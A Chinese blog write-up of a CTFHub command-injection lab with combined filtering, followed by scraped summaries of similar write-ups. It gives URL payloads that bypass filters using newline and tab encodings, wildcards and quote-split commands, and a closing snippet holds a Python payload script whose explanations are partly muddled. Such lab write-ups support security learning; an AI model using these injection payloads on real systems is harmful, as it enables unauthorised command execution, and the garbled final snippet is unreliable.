CTFHub技能树web(持续更新)--RCE--命令注入--综合过滤练习

最新推荐文章于 2024-08-28 16:27:13 发布
最新推荐文章于 2024-08-28 16:27:13 发布
阅读量2.6k 收藏 13
点赞数 7
分类专栏: CTFHub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jiuyongpinyin/article/details/113252968
版权

综合过滤练习

这道题试了好多种方法,最后才发现需要在url里面改才可以,也是参考了大佬的链接
我是大佬链接

在这里插入图片描述
这道题能过滤的基本都过滤了,我们第一步应该想办法查看当前文件夹的内容,这里常用的管道符都不能用,只能用换行符的url编码 %0a,并且去要在url中修改:
在这里插入图片描述

?ip=127.0.0.1%0als#

看到了回显就看到了希望,接下来要进入到flag这个文件夹中来查看该文件夹的内容,这里flag被过滤了,又学到了一个新的知识点TAB的url编码,我们用这个把文件夹的名字补全:
在这里插入图片描述

?ip=127.0.0.1%0als%09*is_here#

接下来就是查看这个文件中的flag了,又又有新知识,因为cat被过滤了,我们可以使用单引号的url编码%27将cat的任意字母包裹:
在这里插入图片描述

?ip=127.0.0.1%0acd%09*is_here%0ac%27a%27t%09*_9436863016875.php#

最后一步就是查看网页源代码得到flag:
在这里插入图片描述

注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正

ctfhub--命令注入练习
qq2489021103的博客
04-01 793
ctfhub-web练习–>各种绕过 1.这没有任何过滤 直接127.0.0.1;ls获取目录,找到flag,然后cat flag在注释里面。 2.这过滤了cat 百度下php类cat方法: 127.0.0.1;ls 得到目录后 127.0.0.1; less flag_11261594711502.php 得到flag 3.过滤空格 用IFS绕过127.0.0.1;cat{IFS}绕过 127.0.0.1;catIFS绕过127.0.0.1;cat{IFS}flag_163033
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2689
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHub | 综合过滤练习
尼泊罗河伯的博客
09-11 778
检查网页源代码发现这次网页对 | 、&& 、 || 、 \ 、 / 、; ,都进行了过滤处理。在之前的文章有对一些常见的 URL 绕过字符使用方法做一个简单的总结。这里先输入本地 IP 进行 ping 命令测试,发现可以正常回显。
CTFHub技能书解笔记-RCE-综合过滤练习
qq_43006864的博客
04-06 3329
直接开综合过滤。提示我们:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢? 估计也是直接给了源码。直接打开链接,看到他过滤了,空格、/、\&、cat flag一堆。 这里我们慢慢绕过吧。一层层过。 首先,还是查看文件,LS他没过滤,但是过滤了;号,这里得找个替代,通过查url编码表发现%0a可以实现换行。 进行利用,发现;可以通过%0a代替 ls执行成功,看到了flag的位置,这里cat被过滤,可以使用nl之类的代替,通过查大佬们的wp和资...
ctfhub-web-综合过滤练习
m0_52484587的博客
08-28 314
&;/ cat flag ctfhub 和空格。在本关过过滤了 | &;/ cat flag ctfhub 和空格。注意 %0a是url编码所以要在url栏中执行。| 我们可以将 base64写在前面。(命令分隔符) 用%0a代替。%09代替空格(${IFS}代替空格)进入flag文件,并查询里面的内容。cat 用more 代替。f*代替flag文件。
CTFHub 命令注入-综合练习
qq_56096156的博客
03-21 1248
1.因为运算符被过滤掉了,我们先用分号测试一下命令是否执行;2.接下来我们用cat命令查看flag文件。发现可以执行,并且找到了flag文件。然后右键查看网页源代码,找到hub.
CTFHub技能树笔记之RCE过滤目录分隔符、过滤运算符、综合过滤练习
weixin_48799157的博客
03-29 2963
小白一个,记录解过程,如有错误请指正! 一、过滤目录分隔符 1.查看当前目录 2.有提示,进去看一下 127.0.0.1;ls flag_is_here 3.根据经验知道我们只要访问到php文件的内容就可以拿到flag了 思路:这里我们可以用&&运算符将命令连接起来就能成功拿到flag 127.0.0.1;cd flag_is_here&&cat flag_19900138617064.php|base64 二、过...
CTFHub_技能树_WebRCE——“命令注入综合练习
Ho1aAs‘s Blog
07-29 2880
文章目录使用工具解过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解过程 最后一来了个狠的,cat、flag还有各种符号都被过滤了 分隔符可以使用%0a代替 若直接使用文本框上传命令会导致字符被转义,直接访问URL /?ip=127.0.0.1%0als => 127.0.0.1;ls 查看目录 接下来要访问flag_is_here,需要绕过空格过滤、flag文字过滤并且显示文件夹的内容 (space) => $
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 2562
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
ctfhub技能树webRCE里的eval执行和命令注入
2302_81010533的博客
03-30 630
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;检查网页显示内容可以发现目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else。检查目录列表发现关于flag的文件,检查内容发现flag。,查看可以访问的文件,发现一个。
ctfhub技能树web rce 命令注入
最新发布
03-29
### CTFHub 技能树 Web RCE 命令注入 练习及解法 #### 关于RCE(远程命令执行) 远程命令执行漏洞允许攻击者通过应用程序接口向服务器发送恶意指令并获得响应。这种类型的漏洞通常发生在输入未被充分验证的情况下...
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7862
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
ctfhub综合过滤练习
m0_56129970的博客
05-22 176
绕过语句127.0.0.1%0als%0acd。ctfhub综合过滤练习
CTFhub-RCE-综合过滤练习
ssss39的博客
11-18 255
修改请求为 POST /?127.0.0.1%0als 列出当前目录。
CTFHUB技能树-命令注入RCE综合练习
zguohuai的博客
03-15 906
CTFHUB攻防世界解决命令综合注入
命令注入————ctfhub过滤cat、空格、目录分隔符、运算符、综合过滤练习
热门推荐
qq_45655564的博客
05-30 1万+
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTFHUB-web-RCE-综合过滤练习
weixin_68416970的博客
08-07 296
用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过。查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、;发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问。
CTFHUB-技能树-Web-RCE(远程代码执行)-远程包含-命令注入-综合过滤练习
Static______的博客
08-19 758
根据目提示以及代码。
ctfhub 过滤运算符 综合过滤练习 读取源代码 远程包含 eval执行 文件包含 php://input
weixin_52268949的博客
08-21 556
过滤运算符 过滤了\和&那么尝试; 成功那么将flag cat出来 127.0.0.1;cat flag_27249269530391.php 得到flag 综合过滤练习 这次过滤有点多过滤了&;空格flag,cat,ctfhub 但是没有过滤%0a,%0d,用IFS取代空格,用{IFS}取代空格,用IFS取代空格,用*绕过关键词过滤,因为在没有定义的情况下,$*在shell命令执行下为空 回显有一个flag_is_here文件夹 payload:http://challenge-
ctfhub技能树RCE
01-09
### CTFHub平台上RCE(远程代码执行)相关的技能树或学习路径 #### 一、基础概念理解 深入理解和掌握远程代码执行的基础原理,包括但不限于漏洞产生的原因以及常见的触发方式。这不仅限于PHP环境下的`eval()`函数滥用,还包括其他编程语言和服务端组件可能存在的风险点。 #### 二、常见防御机制规避技巧 针对不同类型的输入验证与清理措施,探索有效的绕过方法。例如,在给定场景下,当遇到特定字符如`&`、`;`、`|`、`||`被过滤的情况时,可以考虑利用替代符号实现相同功能[^1]。另外,面对某些特殊字符串的限制,像本案例中的URL必须包含指定域名的要求,则可以通过引入`@`符号来进行巧妙处理[^2]。 #### 三、高级技术应用实例分析 结合实际目描述,了解到尽管存在多种命令组合受限的情形——比如管道符已被屏蔽但仍可借助分号作为指令间的连接工具完成多条语句的同时运行;同时注意到文件操作类API未加严格控制的事实,从而成功定位并读取目标敏感数据文件[^3]。此外,还展示了如何运用百分号编码形式(%XX)来应对更多复杂情况的发生,如采用 `%0a` 表示换行、`%09`代表Tab键位移效果,甚至是以 `%5c`转义反斜杠达到分割命令的目的[^4]。 ```python import requests url = "http://example.com/vuln.php?cmd=" payloads = [ "@echo%0aflag_is_here", # 使用 @ 符号绕过 URL 过滤,并用 %0a 替代换行 ";ls%0a-%la", # 利用 ; 分割命令,%0a 实现换行 "%5ccat%5c/proc/self/environ"# 转义后的 cat 命令用于读取环境变量 ] for payload in payloads: response = requests.get(url + payload) print(response.text) ```
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值